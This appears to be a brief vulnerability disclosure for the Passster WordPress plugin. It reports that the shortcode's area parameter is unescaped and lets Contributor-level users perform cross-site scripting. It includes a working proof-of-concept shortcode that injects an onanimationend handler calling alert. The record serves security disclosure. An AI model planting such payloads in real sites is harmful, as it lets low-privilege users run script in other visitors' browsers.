The plugin does not escape the area parameter of its shortcode, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.
[passster password="1" area='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS/)//']
apple502j
apple502j
Yes
2022-12-29 (about 4 months ago)
2022-12-29 (about 4 months ago)
2022-12-29 (about 4 months ago)